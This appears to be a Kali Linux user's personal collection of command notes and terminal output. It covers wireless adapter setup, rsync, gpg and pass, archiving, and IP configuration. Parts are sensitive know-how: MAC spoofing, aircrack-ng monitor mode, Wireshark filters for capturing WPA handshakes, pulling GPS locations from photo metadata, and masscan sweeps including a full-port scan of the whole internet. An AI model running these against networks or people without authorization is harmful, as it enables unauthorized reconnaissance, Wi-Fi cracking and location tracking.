(capab=0x511 status=0 aid=45) [ 27.301034] wlan0: AP has invalid WMM params (AIFSN=1 for ACI 2), will use 2 [ 27.301077] wlan0: AP has invalid WMM params (AIFSN=1 for ACI 3), will use 2 [ 27.306273] wlan0: associated [ 27.334492] wlan0: Limiting TX power to 30 (30 - 0) dBm as advertised by c6:52:61:97:05:b3 [ 27.534237] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready wlan0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.249 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 2600:1700:43f0:d60:b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60:6667:2d19:3e32:9573 prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60::31 prefixlen 128 scopeid 0x0(global) inet6 fe80::b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x20(link) ether b0:7d:64:e7:ba:a3 txqueuelen 1000 (Ethernet) RX packets 2340 bytes 373245 (364.4 KiB) RX errors 0 dropped 216 overruns 0 frame 0 TX packets 2003 bytes 237488 (231.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4099(UP,BROADCAST,MULTICAST) mtu 2312 ether fe:43:54:01:af:17 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 *-network description: Wireless interface physical id: d bus info: usb@1:4 logical name: wlan1 serial: fe:43:54:01:af:17 capabilities: ethernet physical wireless configuration: broadcast=yes driver=rtl88XXau driverversion=5.16.0-kali7-amd64 multicast=yes wireless=unassociated *-usb description: Generic USB device product: 802.11ac WLAN Adapter vendor: Realtek physical id: 4 bus info: usb@1:4 version: 2.00 serial: 00e04c000001 capabilities: usb-2.10 configuration: driver=rtl88XXau maxpower=500mA speed=480Mbit/s *-network description: Wireless interface product: Wi-Fi 6 AX200 vendor: Intel Corporation physical id: 0 bus info: pci@0000:06:00.0 logical name: wlan0 version: 1a serial: b0:7d:64:e7:ba:a3 width: 64 bits clock: 33MHz capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=5.16.0-kali7-amd64 firmware=63.c04f3485.0 cc-a0-63.ucode ip=192.168.1.249 latency=0 link=yes multicast=yes wireless=IEEE 802.11 resources: irq:111 memory:d0600000-d0603fff *-network description: Ethernet interface product: RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller vendor: Realtek Semiconductor Co., Ltd. physical id: 0 bus info: pci@0000:05:00.0 logical name: eth0 version: 15 serial: c0:25:a5:16:53:2d capacity: 1Gbit/s width: 64 bits clock: 33MHz capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=5.16.0-kali7-amd64 firmware=rtl8168h-2_0.0.2 02/26/15 latency=0 link=no multicast=yes port=twisted pair resources: irq:54 ioport:2000(size=256) memory:d0704000-d0704fff memory:d0700000-d0703fff Network: Device-1: Realtek RTL8111/8168/8411 PCI Express Gigabit Ethernet vendor: Dell driver: r8169 v: kernel port: 2000 bus-ID: 05:00.0 IF: eth0 state: down mac: (filter) Device-2: Intel Wi-Fi 6 AX200 vendor: Rivet Networks Killer™ driver: iwlwifi v: kernel bus-ID: 06:00.0 IF: wlan0 state: up mac: (filter) Device-3: Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band 2.4/5Ghz] type: USB driver: rtl88XXau bus-ID: 1-4:2 IF: wlan1 state: dormant mac: (filter) /0/100/2.1/0 eth0 network RTL8111/8168/8411 PCI Express Gigabit Ethern /0/100/2.2/0 wlan0 network Wi-Fi 6 AX200 /d wlan1 network Wireless interface *-network description: Ethernet interface product: RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller vendor: Realtek Semiconductor Co., Ltd. physical id: 0 bus info: pci@0000:05:00.0 logical name: eth0 version: 15 serial: c0:25:a5:16:53:2d capacity: 1Gbit/s width: 64 bits clock: 33MHz capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=5.16.0-kali7-amd64 firmware=rtl8168h-2_0.0.2 02/26/15 latency=0 link=no multicast=yes port=twisted pair resources: irq:54 ioport:2000(size=256) memory:d0704000-d0704fff memory:d0700000-d0703fff *-network description: Wireless interface product: Wi-Fi 6 AX200 vendor: Intel Corporation physical id: 0 bus info: pci@0000:06:00.0 logical name: wlan0 version: 1a serial: b0:7d:64:e7:ba:a3 width: 64 bits clock: 33MHz capabilities: pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=5.16.0-kali7-amd64 firmware=63.c04f3485.0 cc-a0-63.ucode ip=192.168.1.249 latency=0 link=yes multicast=yes wireless=IEEE 802.11 resources: irq:111 memory:d0600000-d0603fff *-network description: Wireless interface physical id: d bus info: usb@1:4 logical name: wlan1 serial: ae:d9:6b:f1:ad:cc capabilities: ethernet physical wireless configuration: broadcast=yes driver=rtl88XXau driverversion=5.16.0-kali7-amd64 multicast=yes wireless=unassociated phy#1 Interface wlan1 ifindex 4 wdev 0x100000001 addr 7e:af:21:53:9d:8c type managed channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz txpower 20.00 dBm phy#0 Unnamed/non-netdev interface wdev 0x2 addr b0:7d:64:e7:ba:a3 type P2P-device txpower 0.00 dBm Interface wlan0 ifindex 3 wdev 0x1 addr b0:7d:64:e7:ba:a3 ssid ATTFJ4Br3A type managed channel 153 (5765 MHz), width: 80 MHz, center1: 5775 MHz txpower 22.00 dBm multicast TXQ: qsz-byt qsz-pkt flows drops marks overlmt hashcol tx-bytes tx-packets 0 0 0 0 0 0 0 0 0 update-initramfs: Generating /boot/initrd.img-5.16.0-kali7-amd64 Backing up initrd.img-5.16.0-kali7-amd64 to /boot/initrd.img-5.16.0-kali7-amd64.old-dkms Making new initrd.img-5.16.0-kali7-amd64 (If next boot fails, revert to initrd.img-5.16.0-kali7-amd64.old-dkms image) ┌──(parth㉿Parth)-[/boot] $ ls -tor total 224429 drwx------ 4 root 1024 Dec 31 1969 efi drwx------ 2 root 12288 Dec 28 11:42 lost+found -rw-r--r-- 1 root 7372896 Mar 23 04:10 vmlinuz-5.16.0-kali6-amd64 -rw-r--r-- 1 root 83 Mar 23 04:10 System.map-5.16.0-kali6-amd64 -rw-r--r-- 1 root 248172 Mar 23 04:10 config-5.16.0-kali6-amd64 -rw-r--r-- 1 root 7381760 Apr 1 08:03 vmlinuz-5.16.0-kali7-amd64 -rw-r--r-- 1 root 83 Apr 1 08:03 System.map-5.16.0-kali7-amd64 -rw-r--r-- 1 root 248161 Apr 1 08:03 config-5.16.0-kali7-amd64 -rw-r--r-- 1 root 83968511 Apr 6 16:28 initrd.img-5.16.0-kali6-amd64 drwxr-xr-x 6 root 1024 Apr 22 17:15 grub -rw-r--r-- 1 root 64756823 Apr 24 21:05 initrd.img-5.16.0-kali7-amd64.old-dkms -rw-r--r-- 1 root 64913890 Apr 24 21:05 initrd.img-5.16.0-kali7-amd64 [ 16.960267] Intel(R) Wireless WiFi driver for Linux [ 16.960351] iwlwifi 0000:06:00.0: enabling device (0000 -) 0002) [ 16.963561] videodev: Linux video capture interface: v2.00 [ 16.965214] iwlwifi 0000:06:00.0: firmware: failed to load iwlwifi-cc-a0-67.ucode (-2) [ 16.965219] firmware_class: See https://wiki.debian.org/Firmware for information about missing firmware [ 16.965221] iwlwifi 0000:06:00.0: Direct firmware load for iwlwifi-cc-a0-67.ucode failed with error -2 [ 16.965232] iwlwifi 0000:06:00.0: firmware: failed to load iwlwifi-cc-a0-66.ucode (-2) [ 16.965233] iwlwifi 0000:06:00.0: Direct firmware load for iwlwifi-cc-a0-66.ucode failed with error -2 [ 16.965241] iwlwifi 0000:06:00.0: firmware: failed to load iwlwifi-cc-a0-65.ucode (-2) [ 16.965243] iwlwifi 0000:06:00.0: Direct firmware load for iwlwifi-cc-a0-65.ucode failed with error -2 [ 16.965250] iwlwifi 0000:06:00.0: firmware: failed to load iwlwifi-cc-a0-64.ucode (-2) [ 16.965251] iwlwifi 0000:06:00.0: Direct firmware load for iwlwifi-cc-a0-64.ucode failed with error -2 [ 16.967918] iwlwifi 0000:06:00.0: firmware: direct-loading firmware iwlwifi-cc-a0-63.ucode [ 16.967931] iwlwifi 0000:06:00.0: api flags index 2 larger than supported by driver [ 16.967940] iwlwifi 0000:06:00.0: TLV_FW_FSEQ_VERSION: FSEQ Version: 89.3.35.37 [ 16.968167] iwlwifi 0000:06:00.0: loaded firmware version 63.c04f3485.0 cc-a0-63.ucode op_mode iwlmvm [ 16.968187] iwlwifi 0000:06:00.0: firmware: failed to load iwl-debug-yoyo.bin (-2) [ 17.072751] iwlwifi 0000:06:00.0: Detected Killer(R) Wi-Fi 6 AX1650x 160MHz Wireless Network Adapter (200NGW), REV=0x340 [ 17.265290] iwlwifi 0000:06:00.0: base HW address: b0:7d:64:e7:ba:a3 [ 18.160056] eth0: 0xffffa59bc002f000, c0:25:a5:16:53:2d, IRQ 45) [ 23.527976] wlan0: authenticate with c6:52:61:97:05:b3 [ 23.533581] wlan0: send auth to c6:52:61:97:05:b3 (try 1/3) [ 23.588318] wlan0: authenticated [ 23.589123] wlan0: associate with c6:52:61:97:05:b3 (try 1/3) [ 23.592718] wlan0: RX AssocResp from c6:52:61:97:05:b3 (capab=0x511 status=0 aid=50) [ 23.595855] wlan0: AP has invalid WMM params (AIFSN=1 for ACI 2), will use 2 [ 23.595863] wlan0: AP has invalid WMM params (AIFSN=1 for ACI 3), will use 2 [ 23.600592] wlan0: associated [ 23.650571] wlan0: Limiting TX power to 30 (30 - 0) dBm as advertised by c6:52:61:97:05:b3 [ 23.793987] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready wlan0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.249 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x20(link) inet6 2600:1700:43f0:d60:3795:9a21:2714:b9b1 prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60:b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60::31 prefixlen 128 scopeid 0x0(global) ether b0:7d:64:e7:ba:a3 txqueuelen 1000 (Ethernet) RX packets 7601 bytes 6813939 (6.4 MiB) RX errors 0 dropped 144 overruns 0 frame 0 TX packets 3460 bytes 526276 (513.9 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4099(UP,BROADCAST,MULTICAST) mtu 2312 ether ca:e7:76:37:c7:2f txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.249 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 2600:1700:43f0:d60:888:b3f5:9c12:9244 prefixlen 64 scopeid 0x0(global) inet6 fe80::b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x20(link) inet6 2600:1700:43f0:d60:b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60::31 prefixlen 128 scopeid 0x0(global) ether b0:7d:64:e7:ba:a3 txqueuelen 1000 (Ethernet) RX packets 9634 bytes 7073255 (6.7 MiB) RX errors 0 dropped 488 overruns 0 frame 0 TX packets 4696 bytes 656438 (641.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312 inet 192.168.1.250 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::d78b:91ea:d2b9:3edf prefixlen 64 scopeid 0x20(link) inet6 2600:1700:43f0:d60::17 prefixlen 128 scopeid 0x0(global) inet6 2600:1700:43f0:d60:72bc:e13f:aba2:a9ca prefixlen 64 scopeid 0x0(global) ether 00:c0:ca:b1:5c:55 txqueuelen 1000 (Ethernet) RX packets 56 bytes 10002 (9.7 KiB) RX errors 0 dropped 13 overruns 0 frame 0 TX packets 26 bytes 3365 (3.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ┌──(parth㉿Parth)-[/etc/kismet] $ ls -tor total 64 -rw-r--r-- 1 root 4737 May 21 2021 kismet_uav.conf -rw-r--r-- 1 root 7768 May 21 2021 kismet.conf -rw-r--r-- 1 root 5540 Jan 24 08:59 kismet_memory.conf -rw-r--r-- 1 root 7959 Jan 24 08:59 kismet_logging.conf -rw-r--r-- 1 root 3305 Jan 24 08:59 kismet_httpd.conf -rw-r--r-- 1 root 4420 Jan 24 08:59 kismet_filter.conf -rw-r--r-- 1 root 4536 Jan 24 08:59 kismet_alerts.conf -rw-r--r-- 1 root 4629 Jan 24 08:59 kismet_80211.conf -rw-r--r-- 1 root 1771 Jan 31 07:51 kismet_wardrive.conf /etc/kismet/kismet.conf Kismet I removed and deleted all I could find of Kismet and then downloaded and compiled it myself. This link was very helpful: https://www.kismetwireless.net/docs/readme/quickstart/ wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312 inet 192.168.3.112 netmask 255.255.255.0 broadcast 192.168.3.255 inet6 fe80::25bf:f187:9e44:9fda prefixlen 64 scopeid 0x20 ether 00:c0:ca:b1:5c:55 txqueuelen 1000 (Ethernet) RX packets 6316 bytes 5131565 (4.8 MiB) RX errors 0 dropped 227 overruns 0 frame 0 TX packets 2821 bytes 509808 (497.8 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 $ sudo ifconfig wlan1 down $ sudo macchanger -rb wlan1 Current MAC: 00:c0:ca:b1:5c:55 (ALFA, INC.) Permanent MAC: 00:c0:ca:b1:5c:55 (ALFA, INC.) New MAC: d8:5f:62:1b:fc:a4 (unknown) $ sudo ifconfig wlan1 up wlan1: flags=4099(UP,BROADCAST,MULTICAST) mtu 2312 inet 192.168.3.112 netmask 255.255.255.0 broadcast 192.168.3.255 inet6 fe80::44ad:62c7:252a:bc1f prefixlen 64 scopeid 0x20 ether d8:5f:62:1b:fc:a4 txqueuelen 1000 (Ethernet) RX packets 6665 bytes 5179704 (4.9 MiB) RX errors 0 dropped 272 overruns 0 frame 0 TX packets 3019 bytes 531003 (518.5 KiB) TX errors 0 dropped 3 overruns 0 carrier 0 collisions 0 To set a specific MAC and avoid 'locally-administered' bit being set. $ sudo macchanger wlan1 -b --mac 00:0f:00:23:34:a7 [WARNING] Ignoring --bia option that can only be used with --random Current MAC: 00:0f:00:57:09:33 (Legra Systems, Inc.) Permanent MAC: 00:0f:00:57:09:33 (Legra Systems, Inc.) New MAC: 00:0f:00:23:34:a7 (Legra Systems, Inc.) wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312 inet 192.168.1.236 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 2600:1700:43f0:d60:72bc:e13f:aba2:a9ca prefixlen 64 scopeid 0x0 inet6 2600:1700:43f0:d60::27 prefixlen 128 scopeid 0x0 inet6 fe80::b34d:e38a:ca25:1fcc prefixlen 64 scopeid 0x20 ether 00:0f:00:23:34:a7 txqueuelen 1000 (Ethernet) RX packets 54662 bytes 31402813 (29.9 MiB) RX errors 0 dropped 3328 overruns 0 frame 0 TX packets 38922 bytes 5847512 (5.5 MiB) TX errors 0 dropped 6 overruns 0 carrier 0 collisions 0 -------- aircrack-ng $ sudo airmon-ng check kill Killing these processes: PID Name 1530 wpa_supplicant $ sudo airmon-ng start wlan1 PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a) phy1 wlan1 88XXau Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz] (monitor mode enabled) $ iwconfig wlan1 unassociated ESSID:"" Nickname:"(WIFI@REALTEK)" Mode:Monitor Frequency=2.457 GHz Access Point: Not-Associated Sensitivity:0/0 Retry:off RTS thr:off Fragment thr:off Power Management:off Link Quality=0/100 Signal level=0 dBm Noise level=0 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 $ ethtool -i wlan1 driver: rtl88XXau version: 5.16.0-kali7-amd64 firmware-version: expansion-rom-version: bus-info: 1-4:1.0 supports-statistics: no supports-test: no supports-eeprom-access: no supports-register-dump: no supports-priv-flags: no Use this wireshark filter to display only wifi handshakes wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || eapol Use this wireshark filter to get just one BSSID wlan.addr==28:28:5D:6C:16:24 ---[This is another NIC]--- [ 105.708907] usb 1-4: new high-speed USB device number 2 using xhci_hcd [ 105.859988] usb 1-4: New USB device found, idVendor=0bda, idProduct=a811, bcdDevice= 2.00 [ 105.859997] usb 1-4: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 105.860001] usb 1-4: Product: 802.11ac WLAN Adapter [ 105.860003] usb 1-4: Manufacturer: Realtek [ 105.860006] usb 1-4: SerialNumber: 00e04c000001 [ 106.367599] usb 1-4: 88XXau 00:0f:00:57:09:33 hw_info[107] [ 106.374311] usbcore: registered new interface driver rtl88XXau [ 107.535604] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready [ 116.331413] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready wlan1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 2312 inet 192.168.1.251 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::d78b:91ea:d2b9:3edf prefixlen 64 scopeid 0x20(link) inet6 2600:1700:43f0:d60:72bc:e13f:aba2:a9ca prefixlen 64 scopeid 0x0(global) inet6 2600:1700:43f0:d60::f prefixlen 128 scopeid 0x0(global) ether 00:0f:00:57:09:33 txqueuelen 1000 (Ethernet) RX packets 207 bytes 31883 (31.1 KiB) RX errors 0 dropped 119 overruns 0 frame 0 TX packets 31 bytes 4138 (4.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# rsync options source destination The following command will sync a single file on a local machine from one location to another location. Here in this example, a file name backup.tar needs to be copied or synced to /tmp/backups/ folder. # rsync -zvh backup.tar.gz /tmp/backups/ Here in this example, /root/rpmpkgs contains some rpm package files and you want that directory to be copied inside /tmp/backups/ folder. # rsync -avzh --progress /root/rpmpkgs /tmp/backups/ a archive v verbose z compress h human-readable r recursive u skip if dest is newer This command will help you sync a remote directory to a local directory. Here in this example, a directory /root/rpmpkgs which is on a remote server is being copied in your local computer in /tmp/myrpms. # rsync -avzh --progress root@192.168.0.141:/root/rpmpkgs /tmp/myrpms These two options allow us to include and exclude files by specifying parameters with these option helps us to specify those files or directories which you want to include in your sync and exclude files and folders with you don’t want to be transferred. Here in this example, the rsync command will include those files and directory only which starts with ‘R’ and exclude all other files and directory. # rsync -avz --include 'R*' --exclude '*' root@192.168.0.141:/var/lib/rpm/ /root/rpm If a file or directory does not exist at the source, but already exists at the destination, you might want to delete that existing file/directory at the target while syncing. # rsync -avz --delete root@192.168.0.151:/var/lib/rpm/ /root/rpm/ Use of this option will not make any changes to the files and shows the output of the command, if the output shows exactly the same you want to do then you can remove the ‘–dry-run‘ option from your command and run on the terminal. # rsync --dry-run --remove-source-files -zvh backup.tar.gz root@192.168.0.151:/tmp/backups/
This is how to pull gps coordinates from an image and display a map of the location. Run this command to report the gps info. You can use a wildcard such as *.jpg. $ exiftool -aps:all -c "%.6f degrees" 20190117_152351.jpg GPS Latitude Ref : North GPS Latitude : 38.189984 degrees GPS Longitude Ref : West GPS Longitude : 84.834734 degrees GPS Altitude Ref : Above Sea Level GPS Altitude : 0 m GPS Time Stamp : 20:23:38 GPS Processing Method : CELLID GPS Date Stamp : 2019:01:17 Using the info above, develope the following string: 38.189984 N 84.834734 W Enter this string as a google search term. You will get a map.
List installed apps $ sudo apt list List apps that are upgradable $ sudo apt list --upgradable $ apt list --installed $ sudo apt update $ sudo apt upgrade $ sudo apt install (package name) $ sudo apt remove (package name)
To encrypt a file: $ gpg --e --sign -r WBBellamy@gmail.com name_of_file To decrypt a file: $ gpg file_name Symmetric encryption $ gpg2 --symmetric myfile List your GPG keys $ gpg --list-keys ---- Backing up your public key List your public keys: gpg --list-keys Look for the line that starts something like "pub 1024D/". The part after the 1024D is the key-id. To export the key: gpg -ao _something_-public.key --export key-id Backing up your private key List your private keys: gpg --list-secret-keys Look for the line that starts something like "sec 1024D/". The part after the 1024D is the key-id. To export the private key: gpg -ao _something_-private.key --export-secret-keys key-id Restoring your keypair To restore your keypair: Copy the two files created above to the machine. Enter the following commands: gpg --import _something_-public.key gpg --import _something_-private.key Make sure you protect these files! To change your passphrase: Enter: gpg --edit-key key-id At the gpg prompt enter: passwd Enter the current passphrase when prompted. Enter the new passphrase twice when prompted. Enter: save To encrypt a file: gpg --encrypt --sign --armor -r mary-geek@protonmail.com filename To decrypt a file: gpg --decrypt coded.asc > plain.txt Insert a new password record $ pass insert archlinux.org/wiki/username View the password store $ pass Generate a new random password where n is the desired password length as a number: $ pass generate archlinux.org/wiki/username n To retrieve a password, enter the gpg passphrase at the following prompt $ pass archlinux.org/wiki/username You can edit an existing file the way you want with command $ pass edit password_name If we no longer need the password, we can remove it with pass rm: $ pass rm google.com/gmail/example@gmail.com Backup your passwore-store $ tar -cz .password-store \ | gpg --sign --encrypt -r 0x77BB8872 \ > password-store-backup.tar.gz.gpg This directory can be restored in a similar way: $ gpg --decrypt \ < password-store-backup.tar.gz.gpg \ | tar -xz ============================================ = pass: the standard unix password manager = = = = v1.7.1 = = = = Jason A. Donenfeld = = Jason@zx2c4.com = = = = http://www.passwordstore.org/ = ============================================ Usage: pass init [--path=subfolder,-p subfolder] gpg-id... Initialize new password storage and use gpg-id for encryption. Selectively reencrypt existing passwords using new gpg-id. pass [ls] [subfolder] List passwords. pass find pass-names... List passwords that match pass-names. pass [show] [--clip[=line-number],-c[line-number]] pass-name Show existing password and optionally put it on the clipboard. If put on the clipboard, it will be cleared in 45 seconds. pass grep search-string Search for password files containing search-string when decrypted. pass insert [--echo,-e | --multiline,-m] [--force,-f] pass-name Insert new password. Optionally, echo the password back to the console during entry. Or, optionally, the entry may be multiline. Prompt before overwriting existing password unless forced. pass edit pass-name Insert a new password or edit an existing password using editor. pass generate [--no-symbols,-n] [--clip,-c] [--in-place,-i | --force,-f] pass-name [pass-length] Generate a new password of pass-length (or 25 if unspecified) with optionally no symbols. Optionally put it on the clipboard and clear board after 45 seconds. Prompt before overwriting existing password unless forced. Optionally replace only the first line of an existing file with a new password. pass rm [--recursive,-r] [--force,-f] pass-name Remove existing password or directory, optionally forcefully. pass mv [--force,-f] old-path new-path Renames or moves old-path to new-path, optionally forcefully, selectively reencrypting. pass cp [--force,-f] old-path new-path Copies old-path to new-path, optionally forcefully, selectively reencrypting. pass git git-command-args... If the password store is a git repository, execute a git command specified by git-command-args. pass help Show this text. pass version Show version information. More information may be found in the pass(1) man page.
$ journalctl - Query the systemd journal
This will compress file.txt and create file.txt.gz, note that this will remove the original file.txt file. $ gzip file.txt You can instead keep the original file and create a compressed copy. $ gzip -c file.txt > file.txt.gz $ gzip -k file.txt > file.txt.gz This will compress all files specified in the command, note again that this will remove the original files specified by turning file1.txt, file2.txt and file3.txt into file1.txt.gz, file2.txt.gz and file3.txt.gz $ gzip file1.txt file2.txt file3.txt All files within the directory and all sub directories can be compressed recursively with the -r flag $ ls -laR To reverse the compression process and get the original file back that you have compressed, you can use the gzip command itself or gunzip which is also part of the gzip package. $ gzip -d file.txt.gz OR $ gunzip file.txt.gz Get info about an archive $ gzip -l linux-3.18.19.tar.gz or $ gzip -v linux-3.18.19.tar.gz Compress a directory $ tar czvf etc.tar.gz /etc/
List available access points $ nmcli dev wifi list $ sudo iwlist wlp2s0 scan $ sudo lshw -C network Change to monitor mode and back to managed $ sudo ifconfig wlp2s0 down $ sudo iwconfig wlp2s0 mode Monitor $ sudo ifconfig wlp2s0 up $ sudo iwconfig $ sudo iwconfig wlp2s0 mode Managed Set the channel: $ sudo iw dev wlp2s0 set channel 6 $ sudo iwconfig wlp2s0 channel 6 Check for blocked WiFi interfaces $ rfkill list $ rfkill unblock wifi Set the AP you want to connect to (network-essid) $ sudo iwconfig wlan0 essid network-essid Set you frequency $ sudo iwconfig wlan0 freq 2.422G
Compress an Entire Directory or a Single File $ tar -czvf name-of-archive.tar.gz /path/to/directory-or-file or $ tar -czvf name-of-archive.tgz /path/to/directory-or-file Extract a tarball into the current directory $ tar -xvf archive.tar Extract a tar gz file (.tar.gz or .tgz) into the /tmp directory $ tar -xzvf archive.tar.gz -C /tmp Find files, case-insensitive $ find /home/username/ -type f -iname "*.err" Find all .db files (ignoring text case) modified in the last 7 days by a user named exampleuser. $ find /home -user exampleuser -mtime -7 -iname ".db" For CPU temps, we will combine watch with the sensors command. $ watch -n 2 sensors
[19:03:15 benb ~] $ ip a 1: lo: (LOOPBACK,UP,LOWER_UP) mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eno1: (BROADCAST,MULTICAST,UP,LOWER_UP) mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 5c:26:0a:69:40:2a brd ff:ff:ff:ff:ff:ff inet 10.32.10.184/24 brd 10.32.10.255 scope global dynamic noprefixroute eno1 valid_lft 5538sec preferred_lft 5538sec inet6 fe80::b756:c126:14b3:9eff/64 scope link noprefixroute valid_lft forever preferred_lft forever 3: wlp2s0: (BROADCAST,MULTICAST) mtu 1500 qdisc fq_codel state DOWN group default qlen 1000 link/ether c0:f8:da:79:de:fc brd ff:ff:ff:ff:ff:ff eno1 inet 10.32.10.184/24 brd 10.32.10.255 scope global dynamic noprefixroute eno1 ifconfig (interface_name) (ip_address) netmask (netmask_address) ifconfig eno1 192.168.0.84 netmask 255.255.255.0 [19:09:55 benb ~] $ ifconfig eno1: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.0.84 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 fe80::b756:c126:14b3:9eff prefixlen 64 scopeid 0x20(link) ether 5c:26:0a:69:40:2a txqueuelen 1000 (Ethernet) RX packets 130081 bytes 21198024 (21.1 MB) RX errors 0 dropped 1 overruns 0 frame 0 TX packets 68144 bytes 4779465 (4.7 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 20 memory 0xe2e00000-e2e20000 lo: flags=73(UP,LOOPBACK,RUNNING) mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10(host) loop txqueuelen 1000 (Local Loopback) RX packets 31630 bytes 2678442 (2.6 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 31630 bytes 2678442 (2.6 MB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 In order to change your IP address on Linux, you will have to add your network configuration in the “/etc/network/interfaces” or create this file if it does not exist already. # Content of /etc/network/interfaces iface eth0 inet static address (ip_address) netmask (network_mask) gateway (gateway_ip) To change your IP address to reflect those changes, you would edit the content of your interfaces file and add the following content $ vim /etc/network/interfaces # Content of /etc/network/interfaces iface eth0 inet static address 192.168.178.32 netmask 255.255.255.0 gateway 192.168.178.1 In order for the changes to be applied, you will need to restart your networking service (managed by ifupdown) # For systemd hosts $ sudo systemctl restart networking.service # For pre-systemd hosts sudo /etc/init.d/networking restart
masscan 10.0.0.0/8 -S -p80 --banners --source-ip 192.16.1.200 masscan 10.0.0.0/8 -S -p80 --banners --source-port 6000
$ sudo masscan usage: masscan -p80,8000-8100 10.0.0.0/8 --rate=10000 scan some web ports on 10.x.x.x at 10kpps masscan --nmap list those options that are compatible with nmap masscan -p80 10.0.0.0/8 --banners -oB <filename> save results of scan in binary format to <filename> masscan --open --banners --readscan <filename> -oX <savefile> read binary scan results in <filename> and save them as xml in <savefile>
masscan -p80,8000-8100 10.0.0.0/8 --echo > xxx.conf $ cat xxx.conf seed = 7993459462523355382 rate = 100 shard = 1/1 nocapture = servername # TARGET SELECTION (IP, PORTS, EXCLUDES) ports = 80,8000-8100 range = 10.0.0.0/8
Single-port Scans $ masscan 10.11.0.0/16 -p443 Multi-port Scans $ masscan 10.11.0.0/16 -p80,443 Scan a Range of Ports $ masscan 10.11.0.0/16 -p22-25 Scan n Number of nmap‘s Top Ports $ masscan 10.11.0.0/16 ‐‐top-ports 100 Scan a single IP and port ./masscan 198.134.112.244 -p443 ./masscan 198.134.112.240/28 -p80,443,25 #multiple ports ./masscan 198.134.112.240/28 -p1000-9999 #range of ports Scanning the top 10 ports masscan 192.168.1.105 ‐‐top-ports 10
# masscan 10.0.0.0/8 -p80 --banners --source-ip 192.168.1.200 # masscan 2a00:1450:4007:810::/112 -p80 --banners --source-ip 2603:3001:2d00:da00:91d7:b54:b498:859d # masscan 0.0.0.0/0 -p0-65535 --max-rate 100000
https://github.com/robertdavidgraham/masscan
